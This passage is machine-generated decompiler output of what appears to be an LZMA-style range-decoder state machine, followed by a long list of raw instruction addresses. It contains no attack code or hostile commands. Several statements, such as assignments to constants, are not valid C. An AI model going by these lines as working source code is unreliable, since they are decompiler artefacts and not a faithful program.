												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                                                                        0x00000000
                                                                                                        0x004064ee
                                                                                                        0x004064ee
                                                                                                        0x004064f2
                                                                                                        0x004064ff
                                                                                                        0x00406509
                                                                                                        0x00000000
                                                                                                        0x004064f4
                                                                                                        0x004064f4
                                                                                                        0x0040652f
                                                                                                        0x00406532
                                                                                                        0x00406535
                                                                                                        0x00406538
                                                                                                        0x00406538
                                                                                                        0x0040653b
                                                                                                        0x00406542
                                                                                                        0x00406547
                                                                                                        0x00406428
                                                                                                        0x0040642b
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067b2
                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067ec
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067ee
                                                                                                        0x004067f2
                                                                                                        0x004069a1
                                                                                                        0x004069b7
                                                                                                        0x004069bf
                                                                                                        0x004069c6
                                                                                                        0x004069c8
                                                                                                        0x004069cf
                                                                                                        0x004069d3
                                                                                                        0x004069d3
                                                                                                        0x004067fe
                                                                                                        0x00406805
                                                                                                        0x0040680d
                                                                                                        0x00406810
                                                                                                        0x00406813
                                                                                                        0x00406813
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fbe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x00000000
                                                                                                        0x00405fcf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fd8
                                                                                                        0x00405fdb
                                                                                                        0x00405fde
                                                                                                        0x00405fe2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fe8
                                                                                                        0x00405feb
                                                                                                        0x00405fed
                                                                                                        0x00405fee
                                                                                                        0x00405ff1
                                                                                                        0x00405ff3
                                                                                                        0x00405ff4
                                                                                                        0x00405ff6
                                                                                                        0x00405ff9
                                                                                                        0x00405ffe
                                                                                                        0x00406003
                                                                                                        0x0040600c
                                                                                                        0x0040601f
                                                                                                        0x00406022
                                                                                                        0x0040602e
                                                                                                        0x00406056
                                                                                                        0x00406058
                                                                                                        0x00406066
                                                                                                        0x00406066
                                                                                                        0x0040606a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x0040605a
                                                                                                        0x0040605d
                                                                                                        0x0040605e
                                                                                                        0x0040605e
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x00406034
                                                                                                        0x00406039
                                                                                                        0x00406039
                                                                                                        0x00406042
                                                                                                        0x0040604a
                                                                                                        0x0040604d
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406070
                                                                                                        0x00406070
                                                                                                        0x00406074
                                                                                                        0x00406920
                                                                                                        0x00000000
                                                                                                        0x00406920
                                                                                                        0x0040607d
                                                                                                        0x0040608d
                                                                                                        0x00406090
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406096
                                                                                                        0x0040609a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040609c
                                                                                                        0x004060a2
                                                                                                        0x004060cc
                                                                                                        0x004060d2
                                                                                                        0x004060d9
                                                                                                        0x00000000
                                                                                                        0x004060d9
                                                                                                        0x004060a8
                                                                                                        0x004060ab
                                                                                                        0x004060b0
                                                                                                        0x004060b0
                                                                                                        0x004060bb
                                                                                                        0x004060c3
                                                                                                        0x004060c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040610b
                                                                                                        0x00406111
                                                                                                        0x00406114
                                                                                                        0x00406121
                                                                                                        0x00406129
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004060e0
                                                                                                        0x004060e0
                                                                                                        0x004060e4
                                                                                                        0x0040692f
                                                                                                        0x00000000
                                                                                                        0x0040692f
                                                                                                        0x004060f0
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fe
                                                                                                        0x00406101
                                                                                                        0x00406104
                                                                                                        0x00406109
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067b2
                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067ec
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406131
                                                                                                        0x00406133
                                                                                                        0x00406136
                                                                                                        0x004061a7
                                                                                                        0x004061aa
                                                                                                        0x004061ad
                                                                                                        0x004061b4
                                                                                                        0x004061be
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00406138
                                                                                                        0x0040613c
                                                                                                        0x0040613f
                                                                                                        0x00406141
                                                                                                        0x00406144
                                                                                                        0x00406147
                                                                                                        0x00406149
                                                                                                        0x0040614c
                                                                                                        0x0040614e
                                                                                                        0x00406153
                                                                                                        0x00406156
                                                                                                        0x00406159
                                                                                                        0x0040615d
                                                                                                        0x00406164
                                                                                                        0x00406167
                                                                                                        0x0040616e
                                                                                                        0x00406172
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x0040617e
                                                                                                        0x00406181
                                                                                                        0x0040619f
                                                                                                        0x004061a1
                                                                                                        0x00000000
                                                                                                        0x00406183
                                                                                                        0x00406183
                                                                                                        0x00406186
                                                                                                        0x00406189
                                                                                                        0x0040618c
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x00406191
                                                                                                        0x00406194
                                                                                                        0x00406196
                                                                                                        0x00406197
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x004063d0
                                                                                                        0x004063d4
                                                                                                        0x004063f2
                                                                                                        0x004063f5
                                                                                                        0x004063fc
                                                                                                        0x004063ff
                                                                                                        0x00406402
                                                                                                        0x00406405
                                                                                                        0x00406408
                                                                                                        0x0040640b
                                                                                                        0x0040640d
                                                                                                        0x00406414
                                                                                                        0x00406415
                                                                                                        0x00406417
                                                                                                        0x0040641a
                                                                                                        0x0040641d
                                                                                                        0x00406420
                                                                                                        0x00406420
                                                                                                        0x00406425
                                                                                                        0x00000000
                                                                                                        0x00406425
                                                                                                        0x004063d6
                                                                                                        0x004063d9
                                                                                                        0x004063dc
                                                                                                        0x004063e6
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040643a
                                                                                                        0x0040643e
                                                                                                        0x00406461
                                                                                                        0x00406464
                                                                                                        0x00406467
                                                                                                        0x00406471
                                                                                                        0x00406440
                                                                                                        0x00406440
                                                                                                        0x00406443
                                                                                                        0x00406446
                                                                                                        0x00406449
                                                                                                        0x00406456
                                                                                                        0x00406459
                                                                                                        0x00406459
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040647d
                                                                                                        0x00406481
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406487
                                                                                                        0x0040648b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406491
                                                                                                        0x00406493
                                                                                                        0x00406497
                                                                                                        0x00406497
                                                                                                        0x0040649a
                                                                                                        0x0040649e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406515
                                                                                                        0x00406519
                                                                                                        0x00406520
                                                                                                        0x00406523
                                                                                                        0x00406526
                                                                                                        0x0040651b
